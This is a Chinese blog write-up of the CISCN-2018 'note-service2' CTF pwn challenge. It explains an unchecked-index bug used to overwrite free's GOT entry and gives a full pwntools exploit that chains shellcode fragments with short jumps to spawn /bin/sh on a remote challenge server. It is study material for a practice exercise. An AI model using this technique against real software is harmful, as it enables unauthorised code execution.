CISCN-2018-Quals note-service2

最新推荐文章于 2022-03-21 10:14:36 发布
最新推荐文章于 2022-03-21 10:14:36 发布
阅读量960 收藏 1
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97000488
版权

这几天看 wiki 有点头疼 刷会 攻防世界

(那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的)

哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了

note-service2   这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固  看见edit 不能用的时候 直接关闭了ida

 

然后发现保护如下

shellcode 一把梭鸭

 问题在于怎么让函数执行shellcode 

这里有一个 溢出点

没有检查下标 我们可以直接 把他 拿到 free的got 里面

然后执行短跳转   直接拿到权限

(本来想自己搞参数的 可是发现有一行 长度超过了 直接  自己/bin/sh)

#coding:utf-8
from pwn import *
context.update(arch = 'amd64')
debug = 1
local =0
if local:
	io=process("./note_service2")
else:
	io=remote("111.198.29.45",44322)
if debug:
	context.log_level = 'debug'

elf = ELF('./note_service2')
#libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

heap_addr=0x2020A0
got_index=(elf.got['free']-heap_addr)/8

def add(index,content):
	io.recvuntil('your choice>> ')
	io.sendline("1")
	io.recvuntil("index:")
	io.sendline(str(index))
	io.recvuntil("size:")
	io.sendline('8')
	io.recvuntil("content:")
	io.sendline(content)

def dele(index):
	io.recvuntil('your choice>> ')
	io.sendline("4")
	io.recvuntil("index:")
	io.sendline(str(index))

# shellcode 

#xor rdx, rdx
#mov rbx, 0x68732f6e69622f2f
#shr rbx, 0x8
#push rbx
#mov rdi, rsp
#push rax
#jmp
#push rdi
#mov rsi, rsp
#mov al, 0x3b
#syscall

if __name__=="__main__":
	#add(0,"/bin/sh")
	'''add(got_index,asm('xor rdx, rdx')+'\xeb\x16')
	add(1,asm('mov rbx, 0x68732f6e69622f2f')+'\xeb\x16')
	#print hex(len(asm('mov rbx, 0x68732f6e69622f2f')+'\xeb\x16'))
	#len=0xc
	add(2,asm('shr rbx, 0x8')+'\xeb\x16')
	add(3,asm('mov rdi, rsp')+'\xeb\x16')
	add(4,asm('push rax')+'\xeb\x16')
	add(5,asm('push rdi')+'\xeb\x16')
	add(6,asm('mov rsi, rsp')+'\xeb\x16')
	add(7,asm('mov al, 0x3b')+'\xeb\x16')
	add(8,asm('syscall'))'''
	add(0,'/bin/sh')
	add(got_index,asm('xor rsi,rsi')+'\x90\x90\xeb\x19')
	add(1,asm('push 0x3b\n pop rax')+'\x90\x90\xeb\x19')
	add(2,asm('xor rdx,rdx')+'\x90\x90\xeb\x19')
	#gdb.attach(io)
	add(3,asm('syscall')+'\x90'*5)
	dele(0)
	io.interactive()
	io.close()

e9 加16 eb 加 19

成功拿到权限

pipixia233333
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 794
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
CISCN-2018-Quals_MS
M3ng@L的博客
03-07 392
CISCN-2018-Quals_Crypto_MSDescriptionDescriptionDescriptionAnalysisAnalysisAnalysisSolving codeSolving~codeSolving codeReferenceReferenceReference keywords:keywords:keywords: 有限域GF(2)下的矩阵乘法 DescriptionDescriptionDescription from Crypto.Util.numbe
[XCTF-pwn] 16_ciscn-2018-Quals-note-service2
weixin_52640415的博客
03-04 225
先查保护,有可写段: 这里有个问题,在ubuntu20的系统下,这个rwx段是栈,也就是可以在栈里直接写代码。实际上这题是在早些版本上运行的,堆也能执行。 ubuntu:~/xctf/016_ciscn-2018-Quals-note-service2$ checksec pwn [*] '/home/xctf/016_ciscn-2018-Quals-note-service2/pwn' Arch: amd64-64-little RELRO: Partial RELR
CISCN-2018-Quals-SM1
MangoFengC++
03-21 4056
题目 from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long from Crypto.Cipher import AES import hashlib from random import randint def gen512num(): order=[] while len(order)!=512: tmp=randint(1,512) if tmp not in order:
supermarket CISCN-2018-Quals
qq_41071646的博客
07-25 689
这个题没有想到有一点 。。。。 参考链接 https://blog.csdn.net/qq_33528164/article/details/80144580 这个题目的漏洞点就是 在 realloc 如果 当重新分配的new_size < pre_size, 返回原指针 否则 重新分配 这个就很真实了 而且他这个 还没有改变用户态指针 如果我们操作一波就可以 用另一个...
cbctf-2018-quals-scrap-square
04-27
cbctf-废料广场创建./config.js和./flag $ docker build -t scrap-square .$ docker run -p 3000:3000 --cap-add=SYS_ADMIN --rm --name scrap-square scrap-square
csawctf-quals-2015-pcapin
05-08
【标题】:“csawctf-quals-2015-pcapin”是一个关于网络安全竞赛的挑战,涉及到了网络数据包捕获与分析的主题。在网络安全领域,尤其是网络安全竞赛(如CSAW CTF)中,参与者经常需要处理PCAP(Packet Capture)...
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
web-ctf-writeups
05-10
web-ctf-writeups web狗爬坑中的学习的writeup整合。 如果有师傅认为侵权,请联系我删除。另欢迎各位师傅投递链接。该repo会不断更新,最近更新日期为:2018/6/26。...2018 qUALS Bl0g https://blog
CTF-and-Learning
05-09
大学二年级:暑假(第二年),在VNPT实习: 夏季(第二年),在ISITDTU CTF中与OpenToAll一起玩: 秋天(第二年),在ISITDTU CTF Final中与OpenToAll一起玩: 冬季(三年级),在Realworld CTF Quals中与OpenToAll...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
CISCN-2018-Quals——supermarket分析
Eagle_hwei的博客
02-24 800
supermarket的题目分析 2020-02-01 11:26:17 by hawkJW 题目附件、ida文件及wp链接   这道题实际上我们大体一看,就可以发现是于堆相关的题目,正好用这道题来学习内存的分配机制。这个分配机制是经过查阅的资料综合一些实验,经过自己的理解得出来的,如果有错误,希望各位师傅谅解! 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所...
CISCN2018-WP
04-30 662
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1650
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不太了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
2018 CISCN reverse
weixin_30735745的博客
05-10 107
2018 CISCN reverse 这题比赛的时候没做出来,主要是心态崩了看不下去。。赛后看了下网上的wp发现不难,是自己想复杂了。这里将我的思路和exp放出来,希望大家一起交流学习。 main函数 它首先是check了输入的前六个字符是否与“CISCN{”匹配,接着使用strtok函数将字符串以“_”分割为三部分,然后分别对这三部分check。 sub_4012DE函数 关键部分如下 将...
XCTF note-service2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 857
查程序保护机制 开启了PIE和CANARRY 没有开启NX,堆栈具有可执行权限 IDA64载入程序,查看main函数 重点分析sub_E30(); 经过分析得知sub_C56()是一个输出提示信息的函数,sub_B91()是获取用户输入值的函数 sub_DC1();sub_DD4();这两个函数的功能未完成 仅实现了sub_CA5();sub_DE7();这两个函数,这两个函数实现了添加和删...
[CISCN2018]sm(矩阵)
weixin_44110537的博客
08-11 866
encrypt from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long from Crypto.Cipher import AES import hashlib from random import randint def gen512num(): order=[] while len(order)!=512: tmp=randint(1,512) if tmp not in or
【PWN系列】攻防世界 pwn note-service2题目分析
Vicl1fe的博客
10-21 460
主要题解:https://blog.csdn.net/seaaseesa/article/details/103003167 这篇文章写已经是不错的了,这里主要写一下我对上面那篇文章的理解 1、以下code0到code3的长度都是七个字节。不足七个字节的用\x90填充。90机器码所代表的汇编指令是nop。因为我们跳转的时候用的是相对偏移跳转,所以必须要填充为七个字节,否则偏移要重新计算了。 code0 = (asm('xor rax,rax') + '\x90\x90\xeb\x19') #rax =
CISCN PWN签到题 task_note_service
Bill
05-02 1632
序言 比赛中这道差那么一点点就做出来了 程序运行 1.menu ---------menu--------- 1. add note 2. show note 3. edit note 4. del note 5. exit your choice&gt;&gt; 2. add 1. add note 2. show note 3. edit note 4. del...
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:...而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值